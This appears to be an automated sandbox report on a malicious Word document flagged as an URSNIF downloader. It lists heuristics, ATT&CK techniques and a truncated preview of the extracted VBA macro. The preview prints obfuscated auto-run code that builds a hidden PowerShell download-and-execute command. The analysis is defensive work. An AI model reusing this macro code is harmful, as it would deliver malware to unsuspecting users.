MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initiating malicious actions upon document opening. The critical heuristic firing for Shell() call in VBA, along with the ClamAV detection of 'Doc.Downloader.URSNIF-6729855-3', strongly indicates that the macro is designed to download and execute a secondary payload. The script attempts to construct a command line for execution, likely involving downloading content from a remote source.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4426 bytes |
SHA-256: ade6ca1d3c1f8183c38b6d2048e0b093c07ae71f31d2e80afe7ed28c3af8fb4e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jauoCtU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "469029868" + "ZMjA"
Second "BMCBQdw" + "62225295"
Second "158" + "w" + "jlNc" + "pIS"
Second "OET" + "113246381" + "Orz" + "111264490"
Second "1007" + "85951675" + "102681016" + "r"
Second "CiWR" + "8579" + "5500" + "WtX"
Second "3257" + "YwiHhTAuSXtiI"
Shell ztjhprTBcX + hDOrGdmrtK, CStr(vbHide)
Second "a" + "HuUW" + "6734" + "84882659"
Second "EdBlMmVju" + "U" + "169644791" + "3754095"
Second "4862" + "acaAtdFHOkBoDn"
End Sub
Attribute VB_Name = "LVVMmGtwaj"
Function ztjhprTBcX()
On _
Error _
Resume _
Next
Second "XbkBWUFwuEw" + "3994" + "MQm" + "OUnsm"
WhVXElduiDB = Format(Chr(9 + 12 + 1 + 14 + 63)) + "md" + " " + "/V^" + ":^" + "O/" + Format(Chr(6 + 8 + 1 + 9 + 43)) + Format(Chr(3 + 4 + 0 + 4 + 23)) + "s^e^t ^" + "5i=" + "^ " + " " + " ^" + " ^ ^ "
Second "G" + "8331" + "1102" + "Xj"
Second "533022878" + "232992923" + "QImmuiGAnonN" + "qCcRwDZoINd"
jGOlCE = " ^ ^ ^ " + " ^ }" + "}{h" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "^" + "t^a" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "};^" + "k" + "aer^" + "b^;" + "^Ewo$ ^" + "m^etI-e" + "kovn" + "^I;)E^w"
Second "5080" + "juH"
Second "84068266" + "WB" + "noZWIKOhwEY" + "156844962"
XvPNucl = "^o$" + " " + "^,p^Y" + "^K^$" + "(e" + "^li^F"
Second "izbdCDHvI" + "YDXFjrOqkB" + "4808" + "osau"
Second "bOYiHQmP" + "334074249" + "VvU" + "hsfpzEnIA"
pzAThh = "d^aoln" + "w^o" + "D^.^" + "B^zT$" + "^{^yr" + "^t^" + "{)^zYk" + "$" + "^ n^i^" + " ^pY" + "^K^$(h" + Format(Chr(9 + 12 + 1 + 14 + 63))
Second "5707" + "3702"
Second "267686639" + "qWW"
Second "Ijq" + "A" + "odf" + "kFQ"
PjjBE = "^aer^of" + "^" + ";'^e" + "x^e" + "^.'^+l" + "r" + Format(Chr(6 + 8 + 1 + 9 + 43)) + "^$+'\" + "'+" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "i^l" + "bu" + "p^"
Second "482" + "UVJ"
IclfoiO = ":vn" + "e^$^=E^" + "w" + "^o" + "^$^;"
Second "bRaH" + "435111795" + "9033" + "wiH"
XiStMbdzPi = "'^5^5" + "3' " + "= ^l" + "r" + Format(Chr(6 + 8 + 1 + 9 + 43)) + "$;)^'" + "^@^'(" + "^t^i" + "l^pS.^'" + "n^k^t" + ".2^" + "gmo" + "=l" + "?^ph^p."
ztjhprTBcX = WhVXElduiDB + jGOlCE + XvPNucl + pzAThh + PjjBE + IclfoiO + XiStMbdzPi
Second "19514661" + "U"
Second "3604" + "LEZB"
Second "VCLujjRCS" + "3875" + "kXKroNhDY" + "16943346"
End Function
Function hDOrGdmrtK()
On _
Error _
Resume _
Next
Second "hQR" + "F" + "QSKOSvXYzvXL" + "30745071"
Second "Tps" + "4109"
OpiAVmVG = "^tok^s" + "na^" + "p^o/T^T" + "R/^m^" + "o" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "^.d^s" + "ay^t^ee" + "^g^h" + "y^t" + "r" + "edn"
Second "SKzm" + "aumVBNhRTaWDS" + "421481159" + "cUpLICqWzM"
Second "GUXVr" + "120037695" + "107228785" + "l"
Second "PG" + "5884" + "4139" + "630"
mVUEYHpii = "a//:" + "pt^th'" + "=z^Y^k" + "$^;" + "tn^e" + "i^" + "l" + Format(Chr(6 + 8 + 1 + 9 + 43)) + "^be^W" + "^.te" + "N " + "t" + Format(Chr(9 + 12 + 1 + 14 + 63)) + "e^j"
Second "495416852" + "ptSMwmZQSz" + "3482" + "woj"
nhAcGiiO = "^bo-" + "^w^en=^" + "Bz^T^$" + " l" + "le^" + "h^sre" + "w^op" + "&&^f^" + "or "
Second "ZcczbjuUB" + "396462912" + "ztb" + "lNaNwDnPFz"
Second "274669218" + "kN"
Second "kvHjnSn" + "L"
zmwzuwS = "/L %^F " + "^in" + " (2^" + "65;-" + "^1^;^0)"
Second "uGbXrRrlNWFz" + "JX" + "wnvwMVrf" + "U"
Second "51804371" + "3736"
Second "vVwYbw" + "EW" + "450227293" + "434013735"
Second "482722415" + "rp"
NTHSmVDTuXB = "^d" + "o ^s^e" + "t" + " " + "v^s^7=" + "!" + "v^s^7" + "!!^5i:~" + "%"
Second "nACD" + "159590138" + "497328512" + "laRafZPvRXuft"
Second "w" + "Y"
Second "VULoY" + "X" + "btpD" + "SRU"
SUKOXNBZZF = "^F" + "," + "1!&" + "&^if %^" + "F=^=^0" + " " + Format(Chr(9 + 12 + 1 + 14 + 63)) + "^" + "a^l^l" + " %v^s^" + "7" + ":^~5%" + For
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.